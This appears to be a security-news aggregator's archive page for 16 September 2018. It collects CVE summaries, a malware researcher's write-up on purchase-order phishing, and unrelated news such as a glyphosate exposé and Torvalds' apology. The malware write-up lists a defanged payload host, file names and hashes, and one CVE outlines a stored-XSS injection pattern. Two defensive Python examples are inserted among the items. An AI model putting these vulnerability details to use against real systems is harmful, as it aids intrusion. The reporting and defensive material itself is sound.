Daily Archives: September 16, 2018

How to gain visibility with global IT asset inventory

In this podcast recorded at Black Hat USA 2018, Pablo Quiroga, Director of Product Management at Qualys, talks about how to gain unprecedented visibility with global IT asset inventory. Here’s a transcript of the podcast for your convenience. My name is Pablo Quiroga. I’m the Director of Product Management at Qualys, and today I’m going to be speaking about how to gain unprecedented visibility with global IT asset inventory. A complete visibility of your IT … More

The post How to gain visibility with global IT asset inventory appeared first on Help Net Security.

Data privacy automation: Unlock your most valuable asset

In years past, data privacy was the purview of the chief privacy officer. However, increasingly, CTOs are being tasked with operationalizing a data privacy solution for the company. That’s because data privacy is fundamentally a data issue, with privacy being an outcome of a comprehensive data protection strategy. In a world of exploding data, it’s impossible for privacy professionals using manual, survey-based approaches to stay on top of this ever-changing sea of information. Companies constantly … More

The post Data privacy automation: Unlock your most valuable asset appeared first on Help Net Security.

The city where the pesticide glyphosate contaminates breast milk and kills even those not yet born

The son of Maria Félix, 21, survived a little more than six months of gestation. He died still in the womb, weighing just 322 grams. The cause of the miscarriage, which happened at 25 weeks of pregnancy, was a malformation: the baby had his intestines outside the abdomen and also heart problems. It is not uncommon for mothers in the region to lose their children early. Maria's baby, by all indications, was one more early victim of the pesticide glyphosate, used on large soy and corn plantations in Uruçuí, 459 km from Teresina, in Piauí.

The same poison that guarantees the wealth of the city's farmers, in the south of the state, is causing an epidemic of poisoning with severe effects on mothers and babies. It is estimated that one in four pregnant women in the city has suffered a miscarriage, that 14% of babies are born underweight (nearly double the national average) and that 83% of mothers have contaminated breast milk. The data come from a survey by public health researcher Inácio Pereira Lima, who investigated the poisonings in Uruçuí in his master's thesis on women's health at the Universidade Federal do Piauí.

I learned of the story of Maria Félix Costa Guimarães in the maternity ward of the Tibério Nunes regional hospital, in the city of Floriano. That is where women from Uruçuí are sent when they have problems during pregnancy. In the first exams, done in July, the malformation in the fetus had already been identified. In September, in her hospital bed, I found the young woman reading the Bible and refusing to eat. She carried a saddened, somewhat ashamed look. She had suffered the miscarriage the day before and was waiting for the doctor to do an ultrasound and make sure that a curettage (surgery to remove remnants of the placenta) would not be necessary.

Ultrasound report confirming the baby's death. 'The main consequence is the atrophy of some organs,' says the doctor.

Reproduction


Maria was not emotionally able to talk, so I spoke with her aunt, public employee Graça Barros Guimarães. She did not know about the research carried out in Uruçuí, but she believes the results reported by Lima. "If you think about it, the pesticide causes respiratory problems and allergies. So of course if the woman is pregnant, the baby can be contaminated too."

Graça told me that her niece has always been surrounded by soy farms. The house where she lives, in Uruçuí, is about 15 km from a plantation. Before, she lived in the rural area of the municipality of Mirador, in Maranhão, where soy is also grown. "The farmers took over everything."

In mid-August I went to Uruçuí to talk with health professionals and farm workers. I wanted to understand how people lived in the municipality contaminated by glyphosate, and whether they had any notion that the problem exists. I also called the researcher Inácio Pereira Lima, who blames agribusiness for people's illnesses. "All of this is a consequence of an economic development model in which only profit is in focus, regardless of the negative consequences for the population," he told me.

Glyphosate epidemic

Glyphosate is the most widely used pesticide in Brazil. It is sold mainly by Monsanto, owned by Bayer, under the trade name Roundup. Its impacts on human health are so well known that the Public Prosecutor's Office asked that its sale be suspended in Brazil until Anvisa carried out its toxicological reassessment. In August, the court agreed and glyphosate was banned. The suspension was called a "disaster" by the Minister of Agriculture, Blairo Maggi, and was fiercely fought by the rural caucus and by industry.

The decision, however, was overturned by an appeals court a few weeks later. Maggi, who is also known as the "soy king," did not hide his enthusiasm at the pesticide's release:

Monsanto says the product is safe, but company emails released last year show that it pressured scientists and regulatory bodies in the US to state that glyphosate does not cause cancer. That did not stop Monsanto from being ordered to pay more than R$ 1 billion to a man who is dying of cancer in the United States. About 4,000 similar lawsuits are under way in that country.

The product accounts for almost half of all pesticides sold in Piauí. The researcher Lima explained that the presence of the substance in breast milk indicates either direct contamination or that the quantities used in the region's agriculture are so high that the excess was not degraded by the plants' metabolism. The women he studied do not even work in the fields: they are poisoned because they do the cleaning, cook on the farms, or because they ate the herbicide in their food. Lima, in his thesis, explains that the body is contaminated through the skin and through the respiratory and oral routes.

Women, the biggest victims

According to the records of the Uruçuí regional hospital, miscarriages usually occur in women between 20 and 30 years old, who get as far as the 10th week of pregnancy. The high number of cases is cited by Iraídes Maria Saraiva, a nurse on duty. "There are many women who arrive bleeding or already with an ultrasound showing that the fetus has no heartbeat. Most of these miscarriages are spontaneous," she told me.

Many women have their pregnancies interrupted in the first few weeks. Without knowing they are pregnant, they keep working surrounded by glyphosate. When they find out, there is nothing more to be done. "It is rarely their first pregnancy and they have no pre-existing diseases. That is, they are young women who appear to be healthy," the nurse observed.

'It is a slow, gradual and daily contamination.'

There are also those who know they are expecting a child but cannot leave their jobs, simply because they depend on the wages. Those who get past the most critical phase and carry the pregnancy to term run a high risk of fetal malformation.

In the Floriano maternity ward, the coordinator of the obstetrics department, Luiz Rosendo Alves da Silva, has seen many cases of miscarriage and malformation. He believes pesticides are to blame. "It is a slow, gradual and daily contamination. The main consequence is the atrophy of some organs, mainly the heart and lungs."

Alanne Pinheiro, a nurse at the Centro de Referência em Saúde do Trabalhador (Cerest), notes that women are exposed to pesticides in a more dangerous way than the men who work directly on applying the poison. "They stay in the kitchen or do the cleaning on the farms and end up inhaling the pesticide indirectly. Since they do not wear special clothing, they suffer more from the effects of passive poisoning."

High GDP, low wages

The city of 21,000 inhabitants has the usual features of the interior, where life is quiet and everybody knows everybody. Almost a third of the population lives in the rural area. Along the 40 km route from downtown to the Assentamento Flores settlement, where many of the workers I intended to talk to live, there are almost no trees, except in isolated spots around the "big house," the farm headquarters. The feeling is of an enormous desert and wealth shared among a few.

In quiet Uruçuí, even those who do not work directly in agriculture are being contaminated.

Photo: handout/Prefeitura Municipal de Uruçuí

Uruçuí is not a poor municipality. Its per capita GDP of R$ 49,000 was the 2nd highest in Piauí in 2015, the last year surveyed by IBGE. It was second only to the neighboring city, the also agricultural Baixa Grande do Ribeiro. But in practice, workers' wages average R$ 1,900 per month.

The ones who really get rich are the farmers. Most of them left the south of Brazil for the Piauí cerrado in search of land and the ideal climate for their crops. Others hold or have held political office as state deputies or city councillors. That is the case of former state deputy Leal Júnior, elected three times to the same office, and of Uruçuí city councilwoman Tânia Fianco.

'Don't talk to them'

Joana* worked as a cook at Fazenda Serra Branca seven years ago. She says the smell of the pesticide reaches the women workers even when they are not in the places where the poison is applied. "Depending on the direction of the wind, we could smell it. And if they were spraying from the plane, it was stronger. Sometimes I would get home with a headache and I knew it was from the poison," recalls the woman, who prefers not to be identified. "You know how it is, right? We depend on the farms," she says with resignation. Her husband still works in agribusiness.

If the harm caused by pesticides were limited to mothers and their babies, the problem would already be serious enough, but public health researcher Inácio Pereira Lima issues a warning. "Since my research was focused on women, I collected biological samples exclusive to them; that is why it was milk. But if the research were about the general population, one could choose another type of sample, such as blood or urine. And it might reach these same results. In other words, the whole population is at risk, not just breastfeeding mothers," the researcher explained to me.

The effects of the pesticide are taboo in the city.

I heard from many people in the city that some farmers are not friendly toward those who cross them. The advice everyone gave me was: "Don't talk to them." The farms have armed guards.

I decided to go to the office of Fazenda Canel, run by the Bortolozzo and Segnini families, originally from Araraquara, in the interior of São Paulo state. They settled in Piauí 30 years ago and were the pioneers of soy farming in the state. I wanted to understand their position. They all refused to talk to me. Employees explained that those in charge were "traveling abroad."

More afraid of being fired than of getting sick

In a city where almost everyone knows each other, the same secret is shared. Nobody tells health professionals when they feel the effects of pesticides in their bodies, and the hospital is rarely visited. If the poisoning is more serious, the workers hide its possible cause from the doctors. It is very difficult to detect pesticide-caused diseases in the laboratory. If the patient does not speak up, many hospitalizations caused by the chemicals are not attributed to them.

The nurse Alanne Pinheiro told me that people are afraid of losing their jobs. "If they say they are sick because of pesticides, that could get around the city and look bad for the farmer. The workers are more afraid of being fired than of an illness."

'When we start to investigate, they don't tell us everything.'

There is also a lack of knowledge about the risks of pesticides. "They don't even believe that any serious problem can happen, because the damage only shows up in the long term. There is no perception that the harm accumulates and can bring irreversible diseases, like a cancer that is only discovered once it has metastasized," says Alanne.

One possible example is João*, husband of Helena*. I talked with her because João leaves early for Fazenda Nova Aliança and only returns at night. This year the worker had an allergy on his arms, but decided to treat it at home. Without a medical evaluation and without tests, João self-medicated. "I don't think it was pesticide, because he's a bricklayer and doesn't handle poison. It must have been because of the cement," his wife reckons.

It is common for residents to attribute the symptoms of poisoning to other causes. "The patients come in with vague complaints, such as burning eyes. But when we start to investigate, they don't tell us everything," comments the nurse Iraídes. On the rare occasions when they do go to the hospital, they are taken by some farm employee. Under that watch, the fear of losing the job is greater and health takes a back seat.

The Centro de Referência em Saúde do Trabalhador is trying to counter the high rate of underreporting: it trains nurses and doctors to report cases of poisoning when they notice the symptoms, regardless of what the patients say.

Technology for profit

Geivan Borges da Silva is an agricultural technician and advises many farmers in Uruçuí. He argues that the use of transgenic seeds reduces the need for pesticides. "Almost 100% of the areas planted here are transgenic varieties, resistant to many types of pests and weeds," he says, downplaying the issue.

In fact, the scientific evidence says the opposite. The pesticide dossier by Abrasco, the Associação Brasileira de Saúde Coletiva, shows that the use of transgenics has increased the need for agrochemicals. Just look at soy, the champion of pesticide use: 93% of the crop is transgenic, and the volume of chemical products in liters increased anyway.

In the southern region of Piauí, corn, soy and cotton seeds are also sold by Monsanto, the same company that supplies the glyphosate, according to the June 2018 registry of the Agência de Defesa Agropecuária do Piauí, Adapi.

Another technology defended by Silva is one that minimizes the spread of pesticide in the air: a product is used that increases the weight of the droplet, making it fall directly onto the plant instead of dispersing with the wind. "It's all precision agriculture to reduce costs," he argues.

It is true that these technologies optimize agricultural production, but they were unable to prevent the poisoning of Emanuel*, who works as a pesticide-spraying machine operator at Fazenda Condomínio União 2000.

After a year on the job, Emanuel felt dizziness, weakness, burning eyes and even vomited. The one who tells this story is his wife, Rosa*. "We went to the hospital and when the test result came out, it showed there was pesticide in his blood. The doctor prescribed medicine, told him to stay off work for a while and to drink a lot of milk."

Emanuel got better, but three years ago he went back to the same job. "He already told me he will only stay until the end of this year. It's not worth losing your health over two thousand a month," says Rosa. It was 6 p.m. when I said goodbye. Her husband had not yet arrived. He works for councilwoman Tânia Fianco, of the PSDB.

In Brazil, the bill known as the PL do Veneno (the "Poison Bill") aims to approve various products more quickly, among them many that are glyphosate-based. The industry lobby is heavy, and it attacks above all Anvisa, a regulatory agency susceptible to all kinds of pressure that has already shown it is willing to play along with big corporations.

*The workers' names have been changed to protect their identities.

Featured photo: ultrasound confirming the malformation in Maria Félix's son. He died in the womb at 25 weeks because of malformations in the abdomen and heart.

The post A cidade em que o agrotóxico glifosato contamina o leite materno e mata até quem ainda nem nasceu appeared first on The Intercept.

CVE-2018-17127

blocking_request.cgi on ASUS GT-AC5300 devices through 3.0.0.4.384_32738 allows remote attackers to cause a denial of service (NULL pointer dereference and device crash) via a request that lacks a timestap parameter.

Latest Hacking News Podcast #122

Ransomware hits Bristol Airport, officials warn of Hurricane Florence phishing scams and former Anonymous hacker raises $2.5 million for start-up on today's episode of Latest Hacking News Podcast.

Latest Hacking News Podcast #122 on Latest Hacking News.

Nvidia Researchers Generate Synthetic Brain MRI Images For AI Research

AI holds a great deal of promise for medical professionals who want to get the most out of medical imaging. However, when it comes to studying brain tumors, there's an inherent problem with the data: abnormal brain images are, by definition, uncommon. New research from Nvidia aims to solve that. From a report: A group of researchers from Nvidia, the Mayo Clinic, and the MGH & BWH Center for Clinical Data Science this weekend are presenting a paper on their work using generative adversarial networks (GANs) to create synthetic brain MRI images. GANs are effectively two AI systems that are pitted against each other -- one that creates synthetic results within a category, and one that identifies the fake results. Working against each other, they both improve. GANs could help expand the data sets that doctors and researchers have to work with, especially when it comes to particularly rare brain diseases.

Read more of this story at Slashdot.

The Challenges of Artificial Intelligence (AI) for Organisations

Governments, businesses and societies as a whole benefit enormously from Artificial Intelligence (AI). AI assists organisations in reducing operational costs, boosting user experience, elevating efficiency and cultivating revenue. But it also creates a number of security challenges for personal data and forms many ethical dilemmas for organisations. Such challenges for information security professionals mean re-calibration […]… Read More

The post The Challenges of Artificial Intelligence (AI) for Organisations appeared first on The State of Security.

The State of Security

What Is the Most Important Skill Cyber Security Professionals Can Possess? The Experts Weigh In

The cyber security field is booming, with demand for cyber security professionals far outpacing supply. This talent shortage has created an industry where pay is high and the options for job seekers are plentiful. Yet there is also a shortage of cyber talent caused by a confluence of factors, including employers demanding too many required […]… Read More

The post What Is the Most Important Skill Cyber Security Professionals Can Possess? The Experts Weigh In appeared first on The State of Security.


CFP October 10, 2018, The International Symposium on Cyber Warfare, Cyber Defense, & Cyber Security (CSCI-ISCW)

theinternetofthings.eu - Cyber Warfare adds an additional dimension to warfare. Generally, it involves the battlespace use and targeting of computers and networks in warfare. Cyber Warfare strategies include both offensive a…


Tweeted by @IoTGazette https://twitter.com/IoTGazette/status/1041514779972579328

“…But I’m a CIP Cyborg Warrior with Real Kung Fu Grip… Then Prove It!”

This blog is written by Jason Christopher, SANS ICS456 instructor. Ok, sure, that's an exaggeration on the existing CIP Ninja[1] nomenclature so many of us use, but you get the point. Sometimes it's hard to make CIP exciting. Depending on your responsibilities, you may face death-by-patching updates or log reviews. You may be trapped … Continue reading ...But I'm a CIP Cyborg Warrior with Real Kung Fu Grip... Then Prove It!

CyberCrime & Doing Time: Dangerous Invoices and Dangerous Infrastructure

One of the things I've learned in twenty-nine years investigating malware is that MOST bad guys are lazy and cheap.  One of the main ways that shows up is in the reuse of infrastructure.  Or as one of my criminology friends says it "most criminals are caught by identifying patterns of habit and convenience."  That's why it can sometimes be useful to examine a malware sample, even if it fails to trigger due to age.  It is likely that OTHER samples are using the same infrastructure or deployment system.

My friends at Cofense published their finding last week that Microsoft Office macros are still the number one way that malware is being delivered via email, accounting for 45% of all malware delivery mechanisms they have recently studied.  Anyone with a spam collection can quickly reach that same conclusion.  A couple such campaigns even showed up in my personal email this week.

Here are three emails from consecutive days last week sent to one of my personal email domains:

A Purchase Order from "ADNOC" (Sep 6, 2018)

A Purchase Order from H&H Nails (Sep 5, 2018)

A Purchase Order from SS Braid (Sep 4, 2018)

The most convincing phish, as PhishMe and later Cofense have repeatedly demonstrated by studying what millions of customers actually click on, are those which imitate a common business practice, such as these Purchase Orders. In an attempt to be helpful, many will open a Purchase Order received in email, even if they don't recognize the company name, often as a means of directing the PO to the appropriate department.  Big Mistake!

Working from oldest to newest: 

SS BRAID PO.doc was recognized as malicious by 33 of 59 AV vendors at VirusTotal; a helpful analysis from VMRay, linked in the comments section, tells us that the sample attempts to download "kc.exe" from the site rollboat[.]tk.
MD5: 02b6f049f4d8246ee982d8c34a160311

sale contract.doc was recognized as malicious by 29 of 59 AV vendors at VirusTotal; in this case Dr.Web shared their analysis with VirusTotal, also revealing that opening the document would launch the same "kc.exe" file from rollboat as the other file.
MD5: 736de7cd6a9c76bd7df49e6b3df6000e
SHA-1: 1315994222d45410c8508cf614378e35c4f56c94


As it turns out, in the three consecutive daily email blasts identified above, each sample had two email attachments, and they were all the same attachments, only with different names. The three 386KB files all had the same hashes, and the three 176KB files also all had the same hashes.  So, for at least September 4, 5, and 6, 2018, kc.exe was the target that the malicious actor wanted us to launch on our computer.  The file is no longer available, which could stall the investigation, but let's look at Habit and Convenience.  If the actor is already hosting on rollboat[.]tk, is it not likely he'll keep doing so until someone prevents him?

Each of the subdirectories contained additional malicious files.  By the directory time stamps, it's clear that this criminal continued delivering the malware that began on Sep 4, Sep 5, and Sep 6 at least through Sep 14th (Friday).  Since everyone needs a weekend, and business-process-imitating malware is most profitable on weekdays, the criminals haven't uploaded any new malware on Saturday September 15th or Sunday September 16th.

The leftover cnn.exe file from September 6th is well-detected (32 of 67 at VirusTotal) although Microsoft, Symantec, and TrendMicro all report the executable as "clean."  The more recent ogox.exe file from September 14th has a slightly poorer 1 in 3 detection (20 of 67 at VirusTotal), as is typical for Friday malware only 60 hours later.  (The various AV engines will all tell you that's because blah blah blah.  I'm running their code. I just infected myself with their AV running. Whatever.) 

Invoice.exe (14 of 67 on VirusTotal; checks smtp.gmail.com and then self-terminates)
MD5: 1261b8382cfa2b905f0f52a3aef49ce4
SHA-1: e80c07f700cf817a1eca1f8186f820492f8a2fbc

Order.exe (34 of 68 on VirusTotal)
MD5: 57b430ea422d1f33fef19f02fb85c7f0
SHA-1: 60a64400207fd9835899189aa0c3cbca027fe8cf

Regardless of what this malware actually does, the two take-aways here?  Malware continues to spread by imitating common business practices, such as processing Invoices and Purchase Orders.  And Criminals continue to rely on Habit and Convenience, which means they are still able to be tracked by looking at their infrastructure choices.

Update

Monday morning, back to work!  Sure enough, we checked the rollboat directory for fresh files this morning:

I'll also note that this morning on my Windows 10 machine running current Chrome, the file downloads were prevented, marked "This file is dangerous, so Chrome has blocked it."  When I told Chrome to let me download one anyway, Windows Defender stopped it.  Sharing information DOES help!
Linus Torvalds Reflects On How He’s Been Hostile To Linux Community Members Over the Years, Issues Apology, and Announces He Will Be Taking Some Time Off

On Sunday, Linus Torvalds spoke about the confusion he had regarding the Maintainer's Summit, but more importantly, how this incident gave him a chance to realize "that I really had been ignoring some fairly deep-seated feelings in the community." In an email to the Linux Kernel Mailing List, Torvalds apologized for hurting people with his behavior over the years, and possibly driving some people "away from kernel development entirely." On that end, said Torvalds, "I am going to take time off and get some assistance on how to understand people's emotions and respond appropriately." He wrote:

[...] It's one thing when you can ignore these issues. Usually it's just something I didn't want to deal with.

This is my reality. I am not an emotionally empathetic kind of person and that probably doesn't come as a big surprise to anybody. Least of all me. The fact that I then misread people and don't realize (for years) how badly I've judged a situation and contributed to an unprofessional environment is not good.

This week people in our community confronted me about my lifetime of not understanding emotions. My flippant attacks in emails have been both unprofessional and uncalled for. Especially at times when I made it personal. In my quest for a better patch, this made sense to me. I know now this was not OK and I am truly sorry.

The above is basically a long-winded way to get to the somewhat painful personal admission that hey, I need to change some of my behavior, and I want to apologize to the people that my personal behavior hurt and possibly drove away from kernel development entirely.

I am going to take time off and get some assistance on how to understand people's emotions and respond appropriately.

Put another way: When asked at conferences, I occasionally talk about how the pain-points in kernel development have generally not been about the _technical_ issues, but about the inflection points where development flow and behavior changed.

These pain points have been about managing the flow of patches, and often been associated with big tooling changes - moving from making releases with "patches and tar-balls" (and the _very_ painful discussions about how "Linus doesn't scale" back 15+ years ago) to using BitKeeper, and then to having to write git in order to get past the point of that no longer working for us.

We haven't had that kind of pain-point in about a decade. But this week felt like that kind of pain point to me.

To tie this all back to the actual 4.19-rc4 release (no, really, this _is_ related!) I actually think that 4.19 is looking fairly good, things have gotten to the "calm" period of the release cycle, and I've talked to Greg to ask him if he'd mind finishing up 4.19 for me, so that I can take a break, and try to at least fix my own behavior.

This is not some kind of "I'm burnt out, I need to just go away" break. I'm not feeling like I don't want to continue maintaining Linux. Quite the reverse. I very much *do* want to continue to do this project that I've been working on for almost three decades.

This is more like the time I got out of kernel development for a while because I needed to write a little tool called "git". I need to take a break to get help on how to behave differently and fix some issues in my tooling and workflow.

And yes, some of it might be "just" tooling. Maybe I can get an email filter in place so that when I send email with curse-words, they just won't go out. Because hey, I'm a big believer in tools, and at least _some_ problems going forward might be improved with simple automation. [...]

Read more of this story at Slashdot.

CVE-2018-17108

The SBIbuddy (aka com.sbi.erupee) application 1.41 and 1.42 for Android might allow attackers to perform Account Takeover attacks by intercepting a security-question response during the initial configuration of the application.

Pelosi’s Counter-Intelligence

dailycaller.com - No one has been more active in the Democrats’ war against our intelligence community than House Speaker Nancy Pelosi. Last May, HUMAN EVENTS reported first on the CIA memorandum that showed that Pelo…


Tweeted by @mdiamond241 https://twitter.com/mdiamond241/status/1041465771694731264

Vulnerability in WebKit Crashes and Restarts iPhones and iPads

Catalin Cimpanu, writing for ZDNet: A security researcher has discovered a vulnerability in the WebKit rendering engine used by Safari that crashes and restarts iOS devices -- iPhones and iPads. The vulnerability can be exploited by loading an HTML page that uses specially crafted CSS code. The CSS code isn't very complex and tries to apply a CSS effect known as backdrop-filter to a series of nested page segments (DIVs). Backdrop-filter is a relatively new CSS property and works by blurring or color shifting the area behind an element. This is a heavy processing task, and some software engineers and web developers have speculated that the rendering of this effect takes a toll on iOS' graphics processing library, eventually leading to a crash of the mobile OS altogether.

Read more of this story at Slashdot.
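A defensive counterpart to the crash page described above, added here as an example and not code from the ZDNet report or from WebKit: a Python scanner that parses an HTML document and measures how deeply elements applying backdrop-filter are nested, so a content filter or crawler can flag pages that match the pattern before they reach a device. It is a heuristic only. It reads inline style attributes and simple class selectors inside <style> blocks, does not evaluate the full cascade, and the threshold of three nested filtered elements is an assumption rather than a figure from the report. The sample pages are constructed.

```python
import re
from html.parser import HTMLParser

# Elements that never get a closing tag; they must not be pushed on the stack.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "param", "source", "track", "wbr"}


class BackdropNestingScanner(HTMLParser):
    """Count how deeply elements that apply CSS backdrop-filter are nested.

    Heuristic: an element "uses" backdrop-filter if its inline style mentions it
    (this also catches -webkit-backdrop-filter) or if one of its classes appears
    in a <style> rule whose body mentions it. The cascade is not evaluated.
    """

    def __init__(self):
        super().__init__()
        self.in_style = False
        self.filtered_classes = set()
        self.stack = []            # per open element: number of filtered ancestors incl. itself
        self.max_chain = 0         # deepest nesting of filtered elements seen
        self.filtered_elements = 0

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self.in_style = True
        a = dict(attrs)
        style = (a.get("style") or "").lower()
        classes = set((a.get("class") or "").split())
        uses = "backdrop-filter" in style or bool(classes & self.filtered_classes)
        parent = self.stack[-1] if self.stack else 0
        chain = parent + (1 if uses else 0)
        if uses:
            self.filtered_elements += 1
            self.max_chain = max(self.max_chain, chain)
        if tag not in VOID_TAGS:
            self.stack.append(chain)

    def handle_startendtag(self, tag, attrs):
        # <div/> style self-closing syntax: open and close in one step.
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.stack.pop()

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        # Inside <style>, record class selectors of rules that set backdrop-filter.
        if not self.in_style:
            return
        for selector, body in re.findall(r"([^{}]+)\{([^}]*)\}", data):
            if "backdrop-filter" in body.lower():
                self.filtered_classes.update(re.findall(r"\.([\w-]+)", selector))


def scan_html(html: str, threshold: int = 3) -> dict:
    """Return nesting statistics and a verdict; threshold is an assumed cut-off."""
    p = BackdropNestingScanner()
    p.feed(html)
    p.close()
    return {"max_nesting": p.max_chain,
            "filtered_elements": p.filtered_elements,
            "suspicious": p.max_chain >= threshold}


# Constructed sample documents (not the researcher's proof of concept).
BENIGN_PAGE = ('<html><head><style>.card { backdrop-filter: blur(4px); }</style></head>'
               '<body><div class="card"><p>hello</p><br></div></body></html>')
SUSPECT_PAGE = ('<html><head><style>.bf { backdrop-filter: blur(8px); }</style></head><body>'
                + '<div class="bf">' * 6 + 'x' + '</div>' * 6 + '</body></html>')
INLINE_PAGE = ('<div style="BACKDROP-FILTER: blur(1px)"><div style="-webkit-backdrop-filter: blur(1px)">'
               '<span>x</span></div></div>')

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("suspect", SUSPECT_PAGE), ("inline", INLINE_PAGE)):
        print(name, scan_html(page))
```

Run over a fetched page, the scanner gives a depth count rather than a yes/no on exploitability; a page with many filtered elements at depth one is normal design, while a long chain of filtered ancestors is the shape the report describes and is worth quarantining or rendering in an isolated process.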

Global Cyber Warfare Market Opportunities, Top Trends, Drivers, Challenge, Analysis by Regions, Research Methodology and Forecast to 2018- 2025 – Market Research Day

marketresearchday.com - The Global Cyber Warfare Market report provides deep analysis of the market. It defines, describes and forecasts the market by product type and key regions, and covers profiles of the key players and compreh…


Tweeted by @CSFI_DCOE https://twitter.com/CSFI_DCOE/status/1041456011553513474

Fans Are Spoofing Spotify With ‘Fake Plays’, And That’s A Problem For Music Charts

An anonymous reader shares a report: The Billboard charts have long been the gold standard by which musicians measure their success, but as recent tantrums by the likes of Nicki Minaj have highlighted, the rising influence of streaming services is upending that model -- and giving die-hard fans a way to manipulate the data. A recent release by the Korean pop group BTS prompted its superfandom, millions strong across the globe, to do just that by launching a sophisticated campaign to make sure the boy band reached No. 1. The strategy employed by the so-called BTS Army went largely like this: Fans in the US created accounts on music streaming services to play BTS's music and distributed the account logins to fans in other countries via Twitter, email, or the instant messaging platform Slack. The recipients then streamed BTS's music continuously, often on multiple devices and sometimes with a virtual private network (VPN), which can fake, or "spoof," locations by rerouting a user's traffic through several different servers across the world. Some fans will even organize donation drives so other fans can pay for premium streaming accounts. "Superfans of pop acts have long been doing this sort of thing," said Mark Mulligan, managing director of the digital media analysis company MIDIA Research. "But if a superfan has decided to listen nonstop to a track, is that fake? If so, how many times do they have to listen to a track continuously before it is deemed 'fake'?" One BTS fan group claimed it distributed more than 1,000 Spotify logins, all to make it appear as though more people in the US were streaming BTS's music and nudge their album Love Yourself: Tear up the Spotify chart, which in turn factors into Billboard's metrics.

Read more of this story at Slashdot.

CVE-2018-17103

** DISPUTED ** An issue was discovered in GetSimple CMS v3.3.13. There is a CSRF vulnerability that can change the administrator's password via admin/settings.php. NOTE: The vendor reported that the PoC was sending a value for the nonce parameter.
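The dispute turns on how the proof of concept was built: a request that already carries the correct nonce is not a cross-site request forgery, because a page on another origin has no way to learn or compute the victim's nonce. The following Python sketch, added here and not taken from GetSimple CMS, shows the pattern an anti-CSRF nonce is meant to enforce: the token is derived per session and per action with an HMAC, compared in constant time, and a password-change handler refuses any request that omits or mis-states it. The names (make_nonce, the "settings" action label, the session identifiers) and the server secret are assumptions for illustration.

```python
import hashlib
import hmac
import secrets

# Hypothetical server secret; a real deployment loads it from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def make_nonce(session_id: str, action: str, secret: bytes = SERVER_SECRET) -> str:
    """Per-session, per-action anti-CSRF token.

    A cross-site page never sees the victim's session identifier or the server
    secret, so it cannot compute this value. The browser attaches cookies to a
    forged request automatically, but it cannot invent a hidden form field.
    """
    msg = f"{session_id}:{action}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def verify_nonce(session_id: str, action: str, presented, secret: bytes = SERVER_SECRET) -> bool:
    """Constant-time comparison; a missing or non-string token is a failure, not a pass."""
    if not isinstance(presented, str) or not presented:
        return False
    return hmac.compare_digest(make_nonce(session_id, action, secret), presented)


def handle_password_change(session_id: str, form: dict, secret: bytes = SERVER_SECRET):
    """Simulated handler for a settings page that changes the admin password.

    session_id stands for the value the server recovers from the session cookie;
    form is the POST body. The nonce is checked before the password is touched.
    Returns (status, message).
    """
    if not verify_nonce(session_id, "settings", form.get("nonce"), secret):
        return 403, "missing or invalid nonce"
    if not form.get("password"):
        return 400, "password required"
    return 200, "password updated"


def simulate():
    """Three requests against one victim session (constructed identifiers):
    a classic CSRF form without a token, a guessed token, and the real one."""
    victim = "sess-victim"
    forged = {"password": "attacker-chosen"}                       # no nonce at all
    guessed = {"password": "attacker-chosen", "nonce": "0" * 64}   # attacker guesses
    legit = {"password": "N3w-Pass!", "nonce": make_nonce(victim, "settings")}
    return (handle_password_change(victim, forged)[0],
            handle_password_change(victim, guessed)[0],
            handle_password_change(victim, legit)[0])


if __name__ == "__main__":
    print(simulate())
```

A proof of concept that only succeeds when it includes a valid nonce demonstrates that the protection exists; the question for an assessment is then how the attacker obtained the token (a leak, an XSS on the same origin, a predictable generator), which is a different finding from CSRF.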

CVE-2018-17100

An issue was discovered in LibTIFF 4.0.9. There is an int32 overflow in multiply_ms in tools/ppm2tiff.c, which can cause a denial of service (crash) or possibly have unspecified other impact via a crafted image file.

CVE-2018-17098

The WavFileBase class in WavFile.cpp in Olli Parviainen SoundTouch 2.0 allows remote attackers to cause a denial of service (heap corruption from size inconsistency) or possibly have unspecified other impact, as demonstrated by SoundStretch.

CVE-2018-17096

The BPMDetect class in BPMDetect.cpp in libSoundTouch.a in Olli Parviainen SoundTouch 2.0 allows remote attackers to cause a denial of service (assertion failure and application exit), as demonstrated by SoundStretch.

CVE-2018-17097

The WavFileBase class in WavFile.cpp in Olli Parviainen SoundTouch 2.0 allows remote attackers to cause a denial of service (double free) or possibly have unspecified other impact, as demonstrated by SoundStretch.

CVE-2018-17101

An issue was discovered in LibTIFF 4.0.9. There are two out-of-bounds writes in cpTags in tools/tiff2bw.c and tools/pal2rgb.c, which can cause a denial of service (application crash) or possibly have unspecified other impact via a crafted image file.

CVE-2018-17092

An issue was discovered in DonLinkage 6.6.8. SQL injection in /pages/proxy/php.php and /pages/proxy/add.php can be exploited via specially crafted input, allowing an attacker to obtain information from a database. The vulnerability can only be triggered by an authorized user.

CVE-2018-17090

An issue was discovered in DonLinkage 6.6.8. The modules /pages/bazy/bazy_adresow.php and /pages/proxy/add.php are vulnerable to stored XSS that can be triggered by closing <textarea> followed by <script></script> tags.

American Eating Habits Are Changing Faster than Fast Food Can Keep Up

Home cooking would be making a comeback if it ever really went away. From a report: Restaurants are getting dinged by the convenience of Netflix, the advent of pre-made meals, the spread of online grocery delivery, plus crushing student debt and a focus on healthy eating. Eighty-two percent of American meals are prepared at home -- more than were cooked 10 years ago, according to researcher NPD Group. The latest peak in restaurant-going was in 2000, when the average American dined out 216 times a year. That figure fell to 185 for the year ended in February, NPD said. Don't be fooled by reports of rising U.S. restaurant sales at big chains like McDonald's. Increases have been driven by price hikes, not more customers. Traffic for the industry was down 1.1 percent in July, the 29th straight month of declines, according to MillerPulse data. "It's counterintuitive because you see a lot of things in the press about restaurant sales increasing," said David Portalatin, a food-industry adviser at NPD. "America does still cook at home." The shift is weighing on the fast-food industry. Eateries already are struggling with higher labor and rent costs that they're passing along to customers, which in turn makes home cooking more economical. McDonald's, Jack in the Box, Shake Shack and Wendy's have all raised prices in the past year.

Read more of this story at Slashdot.

